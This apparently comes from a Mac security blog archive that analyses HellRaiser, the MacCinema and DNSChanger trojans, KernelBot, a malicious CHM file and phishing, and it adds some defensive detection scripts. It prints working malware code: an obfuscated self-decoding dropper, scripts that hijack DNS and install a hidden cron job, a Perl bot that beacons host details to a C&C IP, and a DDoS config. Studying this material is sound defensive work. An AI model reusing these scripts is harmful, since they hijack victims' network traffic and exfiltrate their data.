Categories: Operating Systems

RAT for Mac

RAT for Mac?

With so many RATs (Remote Administration Tools) available for Windows, people wonder whether there is a good and useful RAT for Mac as well.

The search and discussion about this topic go on and on; at one point an online poll favored continuing the development:

A useful description of RATs that work on OS X can be found here.

The most recent development is HellRaiser version 4.2, coded by DCHKG, an underground Mac programming team.

HellRaiser includes a configuration component, where the remote controller can specify the server parameters.

The server component is the application distributed to the target OS X user. It must be run manually to install itself, after which the server runs in the background (hidden from the Dock). Once installed, the server component (the slave) reports back to the master, as shown below.

This is the same version that Intego recently discovered in the wild, disguised as an iPhoto installer.

How would I know if HellRaiser server is installed/running?

Option 1: Open Network Utility and Activity Monitor (/Applications/Utilities/) and kill the process.

Option 2: Open Terminal and type lsof -i (this lists running processes together with their network/internet connections). Look for a dubious process name or connection, take note of its PID, and type kill -9 <PID> in Terminal to kill the process.

If you're using a Mac security scanner, now is the time to check for a signature update! (Most vendors detect this as OSX HellRTS.)

Categories: Computers

Best Mac Software.com

This fraudulent site attempts to scam gullible Mac users.

Please be careful when shopping online. Here are some simple tips for spotting suspicious vendors:

1) You can't find sufficient details to verify the store, such as a contact number and store location.

2) You can't find interactive reviews. Static reviews such as a "Testimonials" page can easily be crafted.

3) Check the DNS records for the IP address. Whois provides enough information to trace the people behind a suspicious website; in most cases you'll find associations with, and a history of, various forms of fraudulent activity.

The best choice is to buy from known, legitimate retailers and online stores. It may cost more, but it assures that your online transaction is secured, provides buyer protection and guarantees satisfaction.

Engaging in fraudulent online deals could cost you your identity and your money.

Stay safe!

Updated as of 15.01.2010

I received this message from Skype (below), which links to a very similar-looking website. Of course, it's a certified scam.

Categories: Computers

Updated Mac Cinema

Last week, I spotted a modified version of MacCinema. It was not significant; the modification was purely to avoid scanner detection.

The script looks like this:

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 |
sed 's/lala/nigeb/' |  sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//'
| tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' |
sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh
`uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala

Anyway, this backdoor trojan is massively distributed around the internet. It relies on Google SEO, so most users stumble onto these malicious sites from Google search results.

Some lure Mac users with promises of free downloads of full-version software, cracks, serials, activators, generators, keys and fixes, just like the screenshot below.

(screenshot: crack)

…while others link to Mac videos like the PornTube page below.

(screenshot: PornTube)

Some malware-serving sites are a bit more aggressive: they do not ask the user to download the DMG file; instead it is downloaded and mounted automatically. Since this behaviour is turned on by default in Safari, you can disable it by following these steps:

1. Open Safari

2. Open “Preferences” under the “Safari” menu

3. Click on the “General” tab

4. Un-check the “Open ’safe’ files after downloading” box

5. Close Safari’s preferences

These steps were previously discussed here.

Stay safe!

Categories: Computers

Bloated Fish

(figure: fishoftheday1)

This picture visualizes data gathered from one malicious node, 75.126.154.249. Hundreds of active domain names share this IP address, as denoted by the green lines. The red lines inside the body of the "Bloated Fish" denote malicious links. These red lines connect to the fish's pink and red lips, noted as "http://self-relax-massage.com/relax/in.cgi?". At the moment, the malicious server leads to its payload, "http://great2008x.com/great/pdf.php?id". This generates an exploit PDF that installs an EXE, targeting users whose default browser opens Adobe Reader automatically.

As observed and mentioned several times, these malicious PDFs have been quietly increasing in number; recently, however, there has been a significant jump due to the use of PHP-generated PDFs, apparently a form of server-side polymorphism, which means the generated PDF changes every time. This makes detection difficult for security scanners that rely on specific file signatures.

Notice the fish tail: there are a few red lines leading to the "MacAccess" trojan. As of writing, they all point to "http://opera-power.com/download/7946645975673d6cc63775/flashcodec.dmg". As usual, it disguises itself as a fake codec. Here's an example below…

(screenshot: picture-2)

“These bloated fish calls cloud as their home.”

Categories: Computers, Operating Systems

Latest OS X threat Krowi installs “DivX”

The latest update of the Krowi threat was found in an Adobe Photoshop cracker installer.

There is not much difference from "iWorkServices" except for the repackaging and the name. However, this should serve as a reminder to be extra careful when downloading stuff!

(screenshot: krowibstrings)

Once installed, you'll find the files and port activity shown below.

(screenshot: divx)

How to remove it? It's the same as the previous instructions, except that you have to change the name from "iWorkServices" to "DivX".

Categories: Computers, Operating Systems

More Threats Exploiting MS08-067

A few days ago, I had too many questions; I was wondering whether MS08-067 was just for show, or should I say an isolated attack, or maybe real blackhat VXers were working on a bigger one. Today I have answers, and unfortunately this wormable vulnerability seems to be going in the wild.

As seen today, a file "67.exe" contains malcode exploiting MS08-067, a vulnerability in the RPC request function "NetPathCanonicalize()" found in netapi32.dll.

The code snippet shows that it is capable of connecting and binding to a remote pipe, after which it sends its payload, another file named "6767.exe", a Chinese malware named "KernelBot", known as a DDoS bot.

From the "6767.exe" code, it is obvious that it targets several security sites by modifying the local hosts file.


This bot then downloads its C&C (command and control) configuration file "cmd.txt" from a remote server, which defines its DDoS attack.

[DDOS_ScriptFlood]
IsScriptFlood=0
CmdID=46
ScriptFloodUrl=http://zhang_231.blog.163.com
ScriptFloodDNS=blog.163.com
ScriptFloodPort=80
IsGetUrlFile=1
ThreadLoopTime=10000
ThreadCount=1
IsTimer=1
Timer=15

[DDOS_UdpFlood]
IsUdpFlood=0
CmdID=9
UdpFloodDNS=222.130.21.3
ThreadCount=6
IsTimer=1
Timer=4

[DDOS_SynFlood]
IsSynFlood=0
CmdID=1
SynFloodDNS=www.bc248.com
SynFloodPort=80
ThreadCount=1
IsTimer=1
Timer=10

[DDOS_TcpFlood]
IsTcpFlood=0
CmdID=26
TcpFloodDNS=
TcpFloodPort=80
IsSendPacket=0
ThreadCount=1
IsTimer=1
Timer=6

The configuration file "cmd.txt" also includes URLs from which it can download further files: "webcc.exe", "Loader.exe", and "67.exe".
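As an added example (not code from the original post), here is a small parser for the cmd.txt layout shown above that turns each [DDOS_*] section into a record and lists the targets of floods that are actually switched on, the kind of extraction an analyst does to turn a recovered C&C config into blocklist or alert entries. The sample config is constructed in the same layout with invented targets; it is not the captured file.

```python
import configparser

# Constructed sample in the cmd.txt layout shown above; targets are invented,
# not taken from a captured configuration.
SAMPLE_CMD_TXT = """[DDOS_SynFlood]
IsSynFlood=1
CmdID=1
SynFloodDNS=www.example.net
SynFloodPort=80
ThreadCount=4
IsTimer=1
Timer=10

[DDOS_UdpFlood]
IsUdpFlood=0
CmdID=9
UdpFloodDNS=192.0.2.7
ThreadCount=6
IsTimer=1
Timer=4

[DDOS_TcpFlood]
IsTcpFlood=1
CmdID=26
TcpFloodDNS=
TcpFloodPort=80
IsSendPacket=0
ThreadCount=1
IsTimer=1
Timer=6
"""


def parse_cmd_txt(text):
    """Return one record per [DDOS_*] section: kind, on/off flag, target, port, threads, timer."""
    cp = configparser.ConfigParser(interpolation=None)  # URLs contain ':' and '%'; no interpolation
    cp.read_string(text)
    records = []
    for section in cp.sections():
        if not section.startswith("DDOS_"):
            continue
        kind = section[len("DDOS_"):]          # e.g. "SynFlood"
        sec = cp[section]                      # option lookups are case-insensitive
        records.append({
            "kind": kind,
            "cmd_id": int(sec.get("CmdID", "0")),
            "enabled": sec.get("Is" + kind, "0") == "1",
            "target": sec.get(kind + "DNS", "") or sec.get(kind + "Url", ""),
            "port": int(sec.get(kind + "Port", "0") or "0"),   # UDP section has no port key
            "threads": int(sec.get("ThreadCount", "1")),
            "timer": int(sec.get("Timer", "0")),
        })
    return records


def active_targets(text):
    """Targets of floods that are switched on and name a host (candidates for a blocklist/alert)."""
    return sorted({r["target"] for r in parse_cmd_txt(text) if r["enabled"] and r["target"]})
```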

Categories: Computers, Operating Systems

Malicious CHM

I was cleaning up my messy folders when I bumped into this file, chungtak.chm. I reckon it was the malicious CHM file spreading around early March of this year.

Is this another exploited file? Let's take a look…

CHM Basic File Structure

Microsoft's HTML Help CHM format starts with 38 bytes of header information, followed by header sections which contain information such as the total file size and the directory list.

This header is followed by directory chunks which consist of index and listing chunks.

The content is self-explanatory, while the section data is actually part of the content which associates other related files. The section data can contain compressed or uncompressed data. Compressed sections use the LZX compression method, which is also widely used in Microsoft cabinet files.

[Read Matthew T. Russotto's description of the CHM file format]

With this basic information, let's investigate the suspicious file, chungtak.chm.

1 – Chungtak.chm
2 – Using a CHM decoder tool, these files were extracted.
3 – Chungtak.chm's main page is Index.htm. Index.htm contains malicious code that causes music.exe to execute.
4 – music.exe is a Trojan dropper. A good analysis was posted on the McAfee Avert Labs blog last March 11.

So, what happened? The CHM file is not exploited; instead, the malicious user uses a legitimate feature that allows an external local file to be executed by linking it from the CHM.

Categories: Computers, Operating Systems

Mac Sweeper First Rogue Application in Mac

Beware! The first rogue application for Mac is here.

This rogue application displays fake information, pretending that it is scanning the user's system. It then displays a fake alert, claiming that bad cookies and files were detected.


Once the user clicks "Remove", it downloads MacSweeperSetup.dmg and installs MacSweeper.app, the rogue application.

There are two images, or looks, that link to this rogue application.

(1) The screenshot shown above is the image displayed when you visit this URL:

http://scanner.macsweeper.com/scan.php
(2) The screenshot shown below is the image displayed when you are linked or redirected (e.g. from Google) to this URL:

http://scanner.macsweeper.com/scan.php?landid=2&os=macos&depid=maxc_clr07&cid=2271&parid=mc_346586211

*** This links to rogue site; Use at your own risk! ***

As of this writing, no security scanner detects it.
MacSweeper does not need the root admin password to execute. In fact it is just a portable application and no installation is required. Here's the screenshot below:

Categories: Computers, Operating Systems

Analysis of OSX Trojan DNS Changer

::::::::::::
File Size
::::::::::::

DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)

:::::::::::::::::
Propagation
:::::::::::::::::
This malicious code does not spread or propagate by itself. It uses an ancient yet effective social engineering technique to entice users to manually install the program. This trojan disguises itself as a video codec and attaches itself to shared, free video downloads. It was first seen linked from porn sites, but later it was also linked from funny-video sites and seen on splogs (spam blogs). Is this in the wild? Yes.

::::::::::::::::::::::::::::::::::
Installation & Behaviour
::::::::::::::::::::::::::::::::::
A user visits a rogue site and downloads a fake video codec. Check the screenshot here.

The disk image file will be mounted automatically but not extracted. This means the user has to manually install the downloaded file.
The downloaded installer, Install.pkg, contains the following files:


Info.plist is the first file read during installation. This file contains detailed usage information and behavior such as:

Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart

This is followed by Archive.bom, which contains the list of files to install.

lsbom -s install.pkg/Contents/Archive.bom
.
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak
./Mozillaplug.plugin/Contents/version.plist
./QuickTime.xpt
./plugins.settings
./sendreq

It then accesses the files Description.plist and PkgInfo, which give the following information:

Version: 1.0
Description: “Its a suppa puppa desc yo”
Title: MacCodec

PkgInfo: pmkrpkg1

This is followed by BundleVersions.plist for version information.

The installer comes with a "License Agreement". Upon clicking "Continue", a message box is displayed requiring the user to click "Agree" to continue the installation process.


OK, let's look further at the malicious code.

Archive.pax.gz, postinstall, postupgrade, preinstall and preupgrade contain the shell scripts that do the dirty work.

Postinstall and postupgrade contain exactly the same code, as do preinstall and preupgrade.

Preinstall is invoked after the user agrees to the License Agreement. This trojan has no damaging payload; it only modifies the user's DNS settings. Let's check the code.

:::::::::::::::::::::::
Code Analysis
:::::::::::::::::::::::

Preinstall script:

#!/bin/bash
s1=85.255.115.22
s2=85.255.112.190
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<<EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)

Using scutil, it retrieves the ID of the user's primary network service (PSID).

It then sets the DNS name server addresses of that service to s1=85.255.115.22 and s2=85.255.112.190.

/usr/sbin/scutil <<EOF
open
d.init
d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS
quit
EOF

**Take note: IP addresses may change per variant.

It checks the crontab for an entry referring to plugins.settings in "/Library/Internet Plug-Ins". This entry is a marker; it indicates whether the trojan has been installed before.

exist=`crontab -l|grep plugins.settings`

If the plugins.settings entry does not exist (meaning it was not yet installed), the installation proceeds by dropping a temporary file, cron.inst:

if [ "$exist" == "" ]; then
echo "* * * * * \"$path/plugins.settings\">/dev/null 2>&1" > cron.inst

cron.inst contains the following line:

* * * * * “/Library/Internet Plug-Ins/QuickTime.xpt”>/dev/null 2>&1

It then installs cron.inst using the crontab command.

crontab cron.inst

The cron entry runs another script, QuickTime.xpt, found in /Library/Internet Plug-Ins/

“/Library/Internet Plug-Ins/QuickTime.xpt”

The redirection on the cron line

>/dev/null 2>&1

sends QuickTime.xpt's standard output to /dev/null and its standard error to the same place, so no output or error message from the script ever appears on the user's screen.

Once cron.inst has been installed, the preinstall script deletes this temporary file.

rm -rf cron.inst
fi

QuickTime.xpt script:

This script is inside Archive.pax.gz. The installation ends by extracting the archive's contents to /Library/Internet Plug-Ins/.

Like the preinstall script, QuickTime.xpt reads the user's network information, attempts to modify the DNS name server settings, checks whether QuickTime.xpt exists and, if so, creates cron.inst, installs it with crontab and deletes the temporary file.
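As an added example (not from the original post), the following Python audit checks a Mac for the two artifacts the preinstall and QuickTime.xpt scripts leave behind: DNS servers in the 85.255.x.x range set via scutil, and a crontab line running QuickTime.xpt or plugins.settings. The scutil and crontab samples are constructed; live_audit() assumes scutil --dns and crontab -l are available and, since the installer runs with root authorization, should be run as root to see root's crontab.

```python
import re
import subprocess

# Indicators from the analysis above; the 85.255.x.x servers may change per variant.
ROGUE_DNS_PREFIXES = ("85.255.",)
MARKER_PATHS = ("/Library/Internet Plug-Ins/QuickTime.xpt",
                "/Library/Internet Plug-Ins/plugins.settings")

# Constructed sample of a scutil DNS dictionary dump (not a real capture).
SAMPLE_SCUTIL_DNS = """<dictionary> {
  ServerAddresses : <array> {
    0 : 85.255.115.22
    1 : 85.255.112.190
  }
}
"""
# Constructed sample of `crontab -l` output containing the trojan's entry.
SAMPLE_CRONTAB = '* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1\n'

# Matches "0 : 1.2.3.4" (scutil d.show) and "nameserver[0] : 1.2.3.4" (scutil --dns).
_SERVER_RE = re.compile(
    r"^\s*(?:nameserver\[\d+\]|\d+)\s*:\s*(\d{1,3}(?:\.\d{1,3}){3})\s*$", re.M)


def dns_servers(scutil_text):
    """All name-server addresses found in scutil output."""
    return _SERVER_RE.findall(scutil_text)


def rogue_dns_servers(scutil_text, prefixes=ROGUE_DNS_PREFIXES):
    """Name servers that fall in the trojan's known ranges."""
    return [ip for ip in dns_servers(scutil_text) if ip.startswith(prefixes)]


def suspicious_cron_lines(crontab_text):
    """crontab lines that invoke the trojan's marker scripts."""
    return [ln for ln in crontab_text.splitlines() if any(p in ln for p in MARKER_PATHS)]


def audit(scutil_text, crontab_text):
    """Human-readable findings; an empty list means no indicator was seen."""
    findings = []
    rogue = rogue_dns_servers(scutil_text)
    if rogue:
        findings.append("DNS servers overridden: " + ", ".join(rogue))
    findings.extend("crontab entry: " + ln for ln in suspicious_cron_lines(crontab_text))
    return findings


def live_audit():
    """Run the checks on this Mac (assumption: scutil --dns and crontab -l exist; run as root)."""
    scutil = subprocess.run(["scutil", "--dns"], capture_output=True, text=True).stdout
    cron = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    return audit(scutil, cron)


if __name__ == "__main__":
    for finding in audit(SAMPLE_SCUTIL_DNS, SAMPLE_CRONTAB) or ["no indicators in sample"]:
        print(finding)
```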

Postinstall script:

#!/bin/sh
path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"

It runs sendreq, which is a Perl script, and then deletes it.

SendReq Script:

This Perl-based bot acts as a backdoor client component and communicates with a remote server through a socket.

#!/usr/bin/perl
use IO::Socket;

It uses MIME Base64 encoding to transmit messages over HTTP; the encoder is built on pack("u") (uuencode) with the alphabet remapped to Base64:

sub encode_base64 {
    use integer;
    my $eol = $_[1];
    $eol = "\n" unless defined $eol;
    my $res = pack("u", $_[0]);          # uuencode the input
    # Remove first character (length byte) of each line, remove newlines
    $res =~ s/^.//mg;
    $res =~ s/\n//g;

    # Map the uuencode alphabet onto the Base64 alphabet
    $res =~ tr|` -_|AA-Za-z0-9+/|;       # `# help emacs
    # fix padding at the end
    my $padding = (3 - length($_[0]) % 3) % 3;
    $res =~ s/.{$padding}$/'=' x $padding/e if $padding;
    # break encoded string into lines of no more than 76 characters each
    if (length $eol) {
        $res =~ s/(.{1,76})/$1$eol/g;
    }
    return $res;
}

The bot command-and-control server:

my $server="85.255.121.37";

**Take note: IP addresses may change per variant.

It runs the uname -p command to retrieve the victim's processor type, and the hostname command to retrieve the machine's host name:

my $cmd=`uname -p;echo ";";hostname`;$cmd=~s/\n//g;

It encodes the gathered information, prefixed with "mac":

my $uniqid=encode_base64("mac;".$cmd); $uniqid=~s/\n//g;

It builds a request to the remote server, carrying the encoded string in the Accept-Language header:

my $request="GET / HTTP/1.1\r\nAccept-Language: $uniqid\r\nHost: $server\r\n\r\n";

The bot then connects to the remote server on TCP port 80 and sends the request:

my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;
close($socket);

The captured packet looks like this:

It sends the victim's information as a base64-encoded string:

GET / HTTP/1.1 Accept-Language: bWFjO2kzODY7cGMtdG9vbHNzLW1hY2Jvb2stcHJvLTE1LmxvY2Fsx Host: 85.255.121.37

Decoded version:

GET / HTTP/1.1 Accept-Language: mac;i386;xx-toolss-macbook-pro-15.local Host: 85.255.121.37

From this information, the C&C (command-and-control) server can determine the total number of infections, and the IP address and geographical location of each infected host.

Furthermore, later versions of this trojan's scripts are obfuscated, making it a little more difficult for security analysts and researchers to read the code.
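As an added example (not from the original post), the following Python detection logic looks for the beacon described above in captured HTTP requests: an Accept-Language header whose whole value is a single base64 token that decodes to "mac;<uname -p>;<hostname>". The sample requests are constructed (the hostname is invented); a normal Accept-Language value and a base64 value that is not a beacon are included to show the logic does not fire on them.

```python
import base64
import binascii
import re

# The bot strips newlines from the encoded value, so the header is one base64 token.
_ACCEPT_LANG_RE = re.compile(r"^Accept-Language:\s*([A-Za-z0-9+/]+={0,2})\s*$", re.I | re.M)
_HOST_RE = re.compile(r"^Host:\s*(\S+)", re.I | re.M)

# Constructed sample requests (hostname invented); the first mimics the captured beacon.
BEACON_VALUE = base64.b64encode(b"mac;i386;example-macbook.local").decode()
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nAccept-Language: " + BEACON_VALUE + "\r\nHost: 85.255.121.37\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n",
    "GET / HTTP/1.1\r\nAccept-Language: ZGVhZGJlZWY=\r\nHost: www.example.com\r\n\r\n",
]


def decode_beacon(value):
    """Return (os, cpu, hostname) if value is the bot's 'mac;<cpu>;<hostname>' beacon, else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None                      # not base64 at all, or not printable text
    parts = text.split(";")
    if len(parts) != 3 or parts[0] != "mac" or not all(parts):
        return None                      # base64, but not the three-field beacon
    return tuple(parts)


def scan_requests(requests):
    """Return (server, os, cpu, hostname) for every request whose Accept-Language is a beacon."""
    hits = []
    for req in requests:
        m = _ACCEPT_LANG_RE.search(req)
        fields = decode_beacon(m.group(1)) if m else None
        if fields is None:
            continue
        host = _HOST_RE.search(req)     # the C&C address the beacon was sent to
        hits.append((host.group(1) if host else "",) + fields)
    return hits


if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print("beacon to %s from %s (%s, %s)" % (hit[0], hit[3], hit[1], hit[2]))
```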

::::::::::::::
Conclusion
::::::::::::::::

Trojan DNSChanger is as simple as changing DNS settings: no complication and no destructive behavior. These are simple scripts that are widely available online, built into a Mac installer and deployed to several existing fake-codec domains. The lesson here is that malware or threats on the Mac do not have to be complicated. With the vast amount of information available online, it is possible for an ordinary person without a programming background, also called a script kiddie, to cause interruption and damage to our daily lives.

Categories: Computers, Operating Systems

Phish Facebook, Phish Myspace too!

Investigating the recent Facebook phishing attack has turned up more information, including Myspace phishing sites and gambling casino spam.

Let’s start with this screenshot below.

Let's perform a DNS lookup on the FQDN 371233.cn.

As you can see, this phishing domain runs on a double fast-flux DNS service, which means both the NS and A records are dynamic and constantly changing. Observing the activity further, there are 10 round-robin addresses that change every minute, and this rogue network hosts thousands of domains. So shutting down these fake sites is not that easy! The screenshot below is a Myspace phishing site.


more links …

login.myspace.com.cfm.fuseaction.splash.mytoken.76701a26.0j643z.com
profile.myspace.com.fuseaction.user.viewprofile.9w.11523822.cn
profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn
profile.myspace.com.fuseaction.id.user.viewprofile.1878800.cn
Aside from phishing sites, this node (particularly myluludns.com) is also responsible for gambling casino spam (6 active mail domains found) and even a marijuana scam (like thebudshop.net and crazybuds.com).

In summary, phishing and scam spam are cross-platform, web-based attacks. They aim to steal your identity and your money!

Mac and iPhone users are not exempt.

@ ithreats.net